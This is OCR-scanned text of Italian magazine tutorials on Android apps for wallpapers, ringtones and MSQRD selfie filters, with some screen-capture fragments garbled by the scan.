MIRATA 
L'applicazione 


71560802 Persorahzzato fio noo pertere Sem 
- 


Trasforma dl no scherno in uicpea 
Gre fiorai nesigion sfor gato 


È 

Pa G 50 DICOLO G dura H 
[IIT] 
E 

| 


ALTRE INFO 


esempio il nome di una città 
che amiamo tanto o il nome 
di animale). Per vedere 
apparire i risultati, ci basta 
confermare la ricerca. 


Rn ci mette a disposizione 

Pi anche un comodo motore di 

o seteromezce ricerca. Tappiamo sull'ap- 
posita icona presente in 

RR a alto a destra dell'interfac- 

aq son cia grafica e digitiamo un 

QU romaetige tag di appartenenza (ad 

a 

Q 


lAliba\ GAGAMMALGIAiNatA MA AMMGLIA I IOIAGI edilizie aa II GAIA AI air 
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SFONDI PER 
! CATEGORIA 
Al termine del 


© download dell'app, avviamo 
Sfondi HD per vedere appari- 
| relasua semplice interfac- 
l cia grafica che ci mette tutto 
a portata di tap. Premiamo 

t sul pulsante Categorie per 
esplorare tutti gli sfondi 

{ opportunamente catalogati 
i a seconda della categoria di 
° appartenenza (Animali, Cibo, 
Città, Costruzioni, ecc.). Quale 
preferiamo? 


TUTTO PRONTO! 
04 Quando avremo 
trovato lo sfondo 


che più ci soddisfa (consi- 
derata la quantità di wal- 
lpaper disponibili la ricerca 
potrebbe durare anche 
ore!), ci basta tappare su 
Scarica per salvare l'im- 
magine nella memoria del 
device. Per settarla come 
wallpaper, invece, tappia- 
mo su Imposta come sfondo. 
Possiamo quindi goderci la 
nostra nuova home screen! 


AMA A MiaAAiAcatiaLi 


Suonerie e sfondi per £ i 


me 
Apalon Apps © 
O Peci3 


Più di 1.000 000 di download 


DOO 


ss: Personalirzario 
Splendidi sfondi e suonerie, tutto in una 


fantastica app di personalizzazione 


ALTRE INFO 


Imposta suono 


Imposta #uono 


| 


., PORTIA 


Accediamo al Play 
Store (ovviamente, anche 
in questo caso il nostro 
device Android deve esse- 
re connesso a Internet) e 
da qui ricerchiamo l'app 
Suonerie e sfondi per me. 
Scarichiamo ed installia- 
mo l'app con un tap sul 
pulsante Installa. 
Al termine, avviamo l'ap- 
plicazione appena scari- 
cata. 


Non appena avre- 
mo trovato uno sfondo che 
ci aggrada e che riteniamo 
perfetto per la nostro home 
screen, per settarlo ci 
basta tappare sul pulsante 
rosso + e scegliere Fisso 
(per visualizzare l'imma- 
gine nella singola home] 

o Larghezza (per farlo scor- 
rere lungo le varie home 
disponibili). È una questio- 
ne di gusto personale o di 
dimensione dell'immagine. 


Quando avremo 
trovato una suoneria che 
riteniamo all'altezza di es- 
sere scaricata ed utilizzata 
sul nostro smartphone, tap- 
piamo sul pulsante rosso + e 
da qui scegliamo una fra le 
opzioni disponibili (Scarica, 
Imposta suono di notifica, 
Imposta suono di allarme o 
Imposta suoneria): possia- 
mo quindi utilizzarla come 
allarme o come notifica di 
SMS o chiamate. 


Suonerie e sfondi per me 


SFONDI 


Drum and Bass 


lil DrumnBass With Piano 


Drum and Bass 


Suonerie e sfondi per me 


00:17 


GIOCHI 


PIEVI FINTETTETAMITIOT IIOATTNNO MORIRONO IAT TAPII TIT TPEPTONESE TA TPREIMESTTE PAPI? 


RLLTIPATIITOTAA REPTEPIOSIOO AI MITTIPO TI PRETE PIE) TPTOPTAPRAFRA MANETTA IV /IOTTTOR] Pe ERA SIRITTT A PPOEIIMONE ET] 


Data CM IMI TITTIL.ZIONIl i0ientati 


Ci ritroviamo dun- 
que nell'interfaccia princi- 
pale dell'app. 

Nel primo tab a sinistra 
{nominato come Sfondi) 
possiamo esplorare miglia- 
ia di wallpaper differenti 
pronti per essere scari- 
cati gratis. Come nel caso 
dell'app scoperta poco fa, 
anche qui gli sfondi sono 
divisi per categoria di ap- 
partenenza. 


Ritorniamo all'in- 
terfaccia grafica principale 
dell'app e da qui spostia- 
moci nel tab Suonerie 
(il secondo a partire da 
sinistra). Anche in que- 
sto caso, tutti i contenuti 
sono divisi per categorie 
(principalmente, il genere 
musicale di appartenenzà). 
Per ascoltare un'anteprima 
della suoneria selezionata, 
possiamo tappare sul nome 
della stessa. 


L'app mette a 
disposizione anche una 
selezione di giochi (tutti 
rigorosamente gratuiti) che 
possono essere scaricati 
direttamente, senza passare 
prima dal Play Store (dun- 
que, una sorta di market 
alternativo ma gratuito). Per 
dare un'occhiata a quelli 
disponibili e procedere al 
download, ci basta raggiun- 
gere dall'interfaccia princi- 
pale dell'app il tab Giochi. 
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IL SELFIE 


GHE NON TI ASPETTI 


Con la giusta app Android puoi realizzare autoscatti davvero divertenti. Il tuo volto 
sì trasforma in quello di simpatici animali, di personaggi d'epoca e di strane creature 


iviamo nell'epoca dei selfie e dello “scatto compulsivo”: ogni occa- 
sione è buona per realizzare un autoscatto che ci ritragga accanto ad 
un amico, al nostro partner, ad un monumento o qualsiasi altra cosa 


riteniamo interessante. E questa selfie-mania ormai davvero dilangante sta fi- 
nendo per standardizzare ogni foto che vediamo sui social network o in giro 


Verifichiamo che il 

nostro smartphone 
o tablet Android sia connes- 
so a Internet (tramite la rete 
36/46 o un hotspot Wi-Fi] 
e accediamo al Play Store. 
Da qui, ricerchiamo l'app 
gratuita MSQRD. Tappiamo 
quindi sul pulsante Installa 
e attendiamo che l'appli- 
di ” Bis sus Cazione venga scaricata ed 
installata sul nostro device 
{sono necessari solo pochi 
secondi). 


MSQRD RÉ 
lekieLieM  Masquerade Technologies, Inc 
2 pei? î 


MSQRD - filtri per Video Selfie 


ALTRE INFO 


Appare quindi 

| l'interfaccia gra- 
fica principale di MSQRD. 
Tutto è molto semplice e 
basilare, proprio come ci si 
aspetta da un'app di questa 
tipologia. Ci basta scorrere 
tra i vari effetti disponibili 
e puntare la fotocamera 
verso il nostro volto per 
vedere in anteprima live il 
risultato ottenuto. Inoltre, 
è possibile fare selfie di 
coppia invertendo i volti! 


per il Web. Ci vorrebbe qualcosa per rendere davvero unici ed interessanti i 
nostri selfie. Qualcosa per distinguerci dalla massa. E questo plus oggi si chia- 
ma Masquerade (MSQRD) ed è una nuova app Android che ci permette di 
applicare divertenti effetti al nostro volto mentre scattiamo un selfie o registria- 
mo un video. Scopriamo come utilizzarla e stupiamo subito tutti i nostri amici! 


Al termine, avvia- 
mo MSQRD: una nuova fine- 
stra di dialogo ci chiederà di 
| assegnare i giusti permessi 
all'app: affinché tutto fun- 

- zioni, infatti, è necessario 
consentire la registrazione 
video, audio e la possibili- 
tà di scattare foto. Senza 
questi permessi, infatti, non 
potremmo realizzare video 
0 foto selfie. Tappiamo 
quindi su Consenti. 


Gi Consentire a MSQRD 
di scattare foto e 
registrare video? 


NEGA CONSENTI 


Tappando sui 
rispettivi pulsanti, abbia- 
mo la possibilità di scat- 
tare una foto o registrare 
un breve video-selfie. Al 
termine della registrazione 
{o dell'acquisizione della 
foto), possiamo condivi- 
dere il risultato sui social 
network o inviarlo privata- 
mente ad un nostro amico 
tramite WhatsApp, Messen- 
ger o posta elettronica. 
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SOLO UNA VOLTA — SEMPRE 


Utilizza un'app diversa 


Ki] Facebook 


